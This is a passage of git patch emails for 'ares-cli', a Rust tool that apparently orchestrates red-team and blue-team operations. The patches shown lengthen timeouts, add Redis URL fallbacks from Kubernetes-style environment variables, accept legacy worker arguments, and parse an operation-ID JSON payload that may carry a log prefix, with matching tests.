u64 = 2700; -/// Threshold for considering a running investigation as stale (15 minutes). -const STALE_INVESTIGATION_THRESHOLD_SECS: i64 = 900; +/// Threshold for considering a running investigation as stale (50 minutes). +const STALE_INVESTIGATION_THRESHOLD_SECS: i64 = 3000; /// Interval between periodic stale investigation checks (5 minutes). const STALE_CHECK_INTERVAL_SECS: u64 = 300; diff --git a/ares-cli/src/orchestrator/blue/sub_agent.rs b/ares-cli/src/orchestrator/blue/sub_agent.rs index 9f7ec3ef..04b8f5cf 100644 --- a/ares-cli/src/orchestrator/blue/sub_agent.rs +++ b/ares-cli/src/orchestrator/blue/sub_agent.rs @@ -20,7 +20,9 @@ use super::callbacks::BlueCallbackHandler; // --------------------------------------------------------------------------- /// Timeout for individual blue tool executions (e.g. Loki/Grafana queries). -const BLUE_TOOL_TIMEOUT_SECS: u64 = 120; +/// `execute_parallel_queries` runs up to 5 queries (2 concurrent), each with +/// a 90s HTTP timeout and up to 2 retries — worst-case ~540s. Give headroom. +const BLUE_TOOL_TIMEOUT_SECS: u64 = 600; /// Wraps an existing (red-team) dispatcher and intercepts blue tool names, /// routing them to `ares_tools::blue::dispatch_blue()` for local execution. diff --git a/ares-cli/src/orchestrator/completion.rs b/ares-cli/src/orchestrator/completion.rs index 8a54c36e..dc0d2a4d 100644 --- a/ares-cli/src/orchestrator/completion.rs +++ b/ares-cli/src/orchestrator/completion.rs @@ -211,7 +211,7 @@ pub async fn wait_for_completion( // When blue team is enabled, auto-submit an investigation from the // operation state if none have been submitted yet, then wait for all // investigations to drain before signalling stop. - // Cap at 20 minutes to avoid hanging forever if an investigation is stuck. + // Cap at 45 minutes to avoid hanging forever if an investigation is stuck. 
---
 ares-cli/src/cli/mod.rs             | 2 +-
 ares-cli/src/main.rs                | 7 ++++++-
 ares-cli/src/orchestrator/config.rs | 5 +++--
 ares-cli/src/orchestrator/mod.rs    | 5 +++--
 ares-cli/src/worker/config.rs       | 3 ++-
 5 files changed, 15 insertions(+), 7 deletions(-)

diff --git a/ares-cli/src/cli/mod.rs b/ares-cli/src/cli/mod.rs
index 4b3df31e..e009d4df 100644
--- a/ares-cli/src/cli/mod.rs
+++ b/ares-cli/src/cli/mod.rs
@@ -25,7 +25,7 @@ pub(crate) struct Cli {
     #[command(subcommand)]
     pub command: Commands,
 
-    /// Redis URL (default: from ARES_REDIS_URL or redis://localhost:6379)
+    /// Redis URL (default: from ARES_REDIS_URL / REDIS_URL or redis://localhost:6379)
     #[arg(long, global = true, env = "ARES_REDIS_URL")]
     pub redis_url: Option<String>,
diff --git a/ares-cli/src/main.rs b/ares-cli/src/main.rs
index c037b2fa..714d7ecf 100644
--- a/ares-cli/src/main.rs
+++ b/ares-cli/src/main.rs
@@ -88,7 +88,12 @@ async fn main() {
     }
 
     // ── Normal CLI parsing (env vars are now populated) ──
-    let cli = Cli::parse();
+    let mut cli = Cli::parse();
+
+    // Fall back to REDIS_URL if ARES_REDIS_URL wasn't set (K8s pods expose REDIS_URL)
+    if cli.redis_url.is_none() {
+        cli.redis_url = std::env::var("REDIS_URL").ok();
+    }
 
     if let Err(e) = run(cli).await {
         error!("{e:#}");
diff --git a/ares-cli/src/orchestrator/config.rs b/ares-cli/src/orchestrator/config.rs
index fcaefb39..61d7e9a2 100644
--- a/ares-cli/src/orchestrator/config.rs
+++ b/ares-cli/src/orchestrator/config.rs
@@ -75,8 +75,9 @@ pub struct InitialCredential {
 
 impl OrchestratorConfig {
     /// Load configuration from environment variables with sensible defaults.
     pub fn from_env() -> anyhow::Result<Self> {
-        let redis_url =
-            env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string());
+        let redis_url = env::var("ARES_REDIS_URL")
+            .or_else(|_| env::var("REDIS_URL"))
+            .unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string());
 
         let raw_op = env::var("ARES_OPERATION_ID")
             .map_err(|_| anyhow::anyhow!("ARES_OPERATION_ID is required"))?;
diff --git a/ares-cli/src/orchestrator/mod.rs b/ares-cli/src/orchestrator/mod.rs
index 1d79481f..3d5232d9 100644
--- a/ares-cli/src/orchestrator/mod.rs
+++ b/ares-cli/src/orchestrator/mod.rs
@@ -684,8 +684,9 @@ async fn run_inner() -> Result<()> {
 async fn run_blue_only() -> Result<()> {
     info!("Running in BLUE-ONLY mode (no red team orchestrator)");
 
-    let redis_url =
-        std::env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string());
+    let redis_url = std::env::var("ARES_REDIS_URL")
+        .or_else(|_| std::env::var("REDIS_URL"))
+        .unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string());
 
     // Load YAML config for observability URLs
     if let Ok(cfg) = ares_core::config::AresConfig::from_env() {
diff --git a/ares-cli/src/worker/config.rs b/ares-cli/src/worker/config.rs
index d3816b1a..c47fef8c 100644
--- a/ares-cli/src/worker/config.rs
+++ b/ares-cli/src/worker/config.rs
@@ -82,7 +82,8 @@ impl WorkerConfig {
     /// - `ARES_POLL_TIMEOUT` — BLPOP timeout in seconds (default: 5)
     pub fn from_env() -> anyhow::Result<Self> {
         let redis_url = env::var("ARES_REDIS_URL")
-            .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL is required"))?;
+            .or_else(|_| env::var("REDIS_URL"))
+            .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL (or REDIS_URL) is required"))?;
 
         let worker_role = env::var("ARES_WORKER_ROLE")
             .map_err(|_| anyhow::anyhow!("ARES_WORKER_ROLE is required"))?;

From d58e6c9c605230598b871dfd0bf15e11a6bcf673 Mon Sep 17 00:00:00 2001
From: Jayson Grace
Date: Fri, 17 Apr 2026 15:55:09 -0600
Subject: [PATCH 09/10] fix: improve compatibility with legacy worker and
 operation ID input formats

**Added:**

- Accept and ignore a legacy positional role argument and Python-style
  `--worker-args.*` flags in the worker CLI command for compatibility

**Changed:**

- Updated the worker config to allow `ARES_ROLE` as a fallback for the
  `ARES_WORKER_ROLE` environment variable, improving compatibility with
  legacy deployments
- Enhanced operation ID JSON parsing to handle strings prefixed with
  telemetry or log output, ensuring robust extraction of JSON payloads in
  the orchestrator config (see the sketch after this list)
- Updated the main CLI dispatch to support the new worker command structure
  with legacy arguments

**Removed:**

- Legacy strictness requiring only `ARES_WORKER_ROLE` in the worker config;
  `ARES_ROLE` is now also accepted for better migration support
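The noise-tolerant parse, sketched standalone (the function name is illustrative; the real logic lives in `OrchestratorConfig::from_env` and additionally handles the plain operation-id case, which this sketch does not):

```rust
use serde_json::Value;

/// Skip any log/telemetry prefix and parse from the first '{' onward.
/// Only covers the JSON branch: a plain operation-id string contains no
/// '{' and is handled separately in the real code.
fn extract_operation_json(raw: &str) -> anyhow::Result<Value> {
    let start = raw
        .find('{')
        .ok_or_else(|| anyhow::anyhow!("no JSON payload found"))?;
    Ok(serde_json::from_str(&raw[start..])?)
}

fn main() -> anyhow::Result<()> {
    let noisy = "2026-04-17T21:35:33Z INFO telemetry initialized\n{\"operation_id\":\"op-1\"}";
    assert_eq!(extract_operation_json(noisy)?["operation_id"], "op-1");
    Ok(())
}
```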
---
 ares-cli/src/cli/mod.rs             | 10 +++++++++-
 ares-cli/src/main.rs                |  2 +-
 ares-cli/src/orchestrator/config.rs | 16 ++++++++++++++--
 ares-cli/src/worker/config.rs       |  3 ++-
 4 files changed, 26 insertions(+), 5 deletions(-)

diff --git a/ares-cli/src/cli/mod.rs b/ares-cli/src/cli/mod.rs
index e009d4df..de3041c3 100644
--- a/ares-cli/src/cli/mod.rs
+++ b/ares-cli/src/cli/mod.rs
@@ -81,5 +81,13 @@ pub(crate) enum Commands {
     Orchestrator,
 
     /// Run a worker (task executor)
-    Worker,
+    Worker {
+        /// Legacy positional role argument (ignored; use ARES_WORKER_ROLE env var)
+        #[arg(hide = true)]
+        _role: Option<String>,
+
+        /// Accept and ignore legacy Python-style --worker-args.* flags
+        #[arg(long = "worker-args.redis-url", hide = true)]
+        _legacy_redis_url: Option<String>,
+    },
 }
diff --git a/ares-cli/src/main.rs b/ares-cli/src/main.rs
index 714d7ecf..76a5f0e4 100644
--- a/ares-cli/src/main.rs
+++ b/ares-cli/src/main.rs
@@ -109,6 +109,6 @@ async fn run(cli: Cli) -> Result<()> {
         Commands::History(cmd) => history::run_history(cmd).await,
         Commands::Config(cmd) => config::run_config(cmd),
         Commands::Orchestrator => orchestrator::run().await,
-        Commands::Worker => worker::run().await,
+        Commands::Worker { .. } => worker::run().await,
     }
 }
diff --git a/ares-cli/src/orchestrator/config.rs b/ares-cli/src/orchestrator/config.rs
index 61d7e9a2..841ebb23 100644
--- a/ares-cli/src/orchestrator/config.rs
+++ b/ares-cli/src/orchestrator/config.rs
@@ -84,8 +84,12 @@ impl OrchestratorConfig {
 
         // ARES_OPERATION_ID may be a plain operation-id string OR a full JSON
         // payload (the queue dispatcher passes the entire operation request JSON).
-        let (operation_id, target_domain, target_ips, json_cred) = if raw_op.starts_with('{') {
-            let v: serde_json::Value = serde_json::from_str(&raw_op)
+        // The value may also be prefixed with log/telemetry output from the
+        // wrapper script, so we search for the first `{` in the string.
+        let json_start = raw_op.find('{');
+        let (operation_id, target_domain, target_ips, json_cred) = if let Some(pos) = json_start {
+            let json_str = &raw_op[pos..];
+            let v: serde_json::Value = serde_json::from_str(json_str)
                 .map_err(|e| anyhow::anyhow!("Failed to parse ARES_OPERATION_ID JSON: {e}"))?;
             let op_id = v["operation_id"]
                 .as_str()
@@ -296,6 +300,14 @@ mod tests {
         assert_eq!(c.target_domain, "contoso.local");
         assert_eq!(c.target_ips, vec!["192.168.58.1", "192.168.58.2"]);
 
+        // JSON payload prefixed with telemetry output (wrapper script noise)
+        let noisy = format!("2026-04-17T21:35:33Z INFO telemetry initialized\n{payload}");
+        std::env::set_var("ARES_OPERATION_ID", &noisy);
+        let c = OrchestratorConfig::from_env().unwrap();
+        assert_eq!(c.operation_id, "op-json-test");
+        assert_eq!(c.target_domain, "contoso.local");
+        assert_eq!(c.target_ips, vec!["192.168.58.1", "192.168.58.2"]);
+
         // JSON payload with nested initial_credential (Python format)
         let payload = r#"{"operation_id":"op-cred","target_domain":"contoso.local","target_ips":[],"initial_credential":{"username":"admin","password":"Pass123","domain":"contoso.local"}}"#;
         std::env::set_var("ARES_OPERATION_ID", payload);
diff --git a/ares-cli/src/worker/config.rs b/ares-cli/src/worker/config.rs
index c47fef8c..e2e360be 100644
--- a/ares-cli/src/worker/config.rs
+++ b/ares-cli/src/worker/config.rs
@@ -86,7 +86,8 @@ impl WorkerConfig {
             .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL (or REDIS_URL) is required"))?;
 
         let worker_role = env::var("ARES_WORKER_ROLE")
-            .map_err(|_| anyhow::anyhow!("ARES_WORKER_ROLE is required"))?;
+            .or_else(|_| env::var("ARES_ROLE"))
+            .map_err(|_| anyhow::anyhow!("ARES_WORKER_ROLE (or ARES_ROLE) is required"))?;
 
         let pod_name = env::var("ARES_POD_NAME")
             .or_else(|_| env::var("HOSTNAME"))

From 1d08ebb11a788ba0dab9b86ff2b75feae6b10933 Mon Sep 17 00:00:00 2001
From: Jayson Grace
Date: Fri, 17 Apr 2026 16:32:25 -0600
Subject: [PATCH 10/10] feat: support constructing redis url from k8s-style
 env vars

**Changed:**

- Enhanced redis URL detection to build the URL from `REDIS_HOST`,
  `REDIS_PORT`, `REDIS_DB`, and `REDIS_PASSWORD` when both `ARES_REDIS_URL`
  and `REDIS_URL` are unset, improving compatibility with Kubernetes and
  similar deployments (see the sketch after this list) -
  `ares-cli/src/worker/config.rs`
- Updated the error message to list all accepted redis configuration
  variables
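The shape of the constructed URL, as a standalone sketch that mirrors the change below (the helper name is illustrative; note the password is interpolated verbatim, so values that would need URL-encoding are out of scope here):

```rust
use std::env;

/// Assemble redis://[:password@]host:port/db from K8s-style parts.
/// REDIS_HOST is required; port and db default to 6379 and 0.
fn redis_url_from_parts() -> Result<String, env::VarError> {
    let host = env::var("REDIS_HOST")?;
    let port = env::var("REDIS_PORT").unwrap_or_else(|_| "6379".to_string());
    let db = env::var("REDIS_DB").unwrap_or_else(|_| "0".to_string());
    Ok(match env::var("REDIS_PASSWORD") {
        Ok(pass) => format!("redis://:{pass}@{host}:{port}/{db}"),
        Err(_) => format!("redis://{host}:{port}/{db}"),
    })
}

fn main() {
    env::set_var("REDIS_HOST", "redis.default.svc");
    env::set_var("REDIS_PASSWORD", "s3cr3t");
    assert_eq!(
        redis_url_from_parts().unwrap(),
        "redis://:s3cr3t@redis.default.svc:6379/0"
    );
}
```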
---
 ares-cli/src/worker/config.rs | 14 +++++++++++++-
 1 file changed, 13 insertions(+), 1 deletion(-)

diff --git a/ares-cli/src/worker/config.rs b/ares-cli/src/worker/config.rs
index e2e360be..e772131e 100644
--- a/ares-cli/src/worker/config.rs
+++ b/ares-cli/src/worker/config.rs
@@ -83,7 +83,19 @@ impl WorkerConfig {
     pub fn from_env() -> anyhow::Result<Self> {
         let redis_url = env::var("ARES_REDIS_URL")
             .or_else(|_| env::var("REDIS_URL"))
-            .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL (or REDIS_URL) is required"))?;
+            .or_else(|_| {
+                // Construct from individual components (K8s pods expose these)
+                let host = env::var("REDIS_HOST")?;
+                let port = env::var("REDIS_PORT").unwrap_or_else(|_| "6379".to_string());
+                let db = env::var("REDIS_DB").unwrap_or_else(|_| "0".to_string());
+                match env::var("REDIS_PASSWORD") {
+                    Ok(pass) => Ok(format!("redis://:{pass}@{host}:{port}/{db}")),
+                    Err(_) => Ok(format!("redis://{host}:{port}/{db}")),
+                }
+            })
+            .map_err(|_: env::VarError| {
+                anyhow::anyhow!("Redis URL required: set ARES_REDIS_URL, REDIS_URL, or REDIS_HOST")
+            })?;
 
         let worker_role = env::var("ARES_WORKER_ROLE")
             .or_else(|_| env::var("ARES_ROLE"))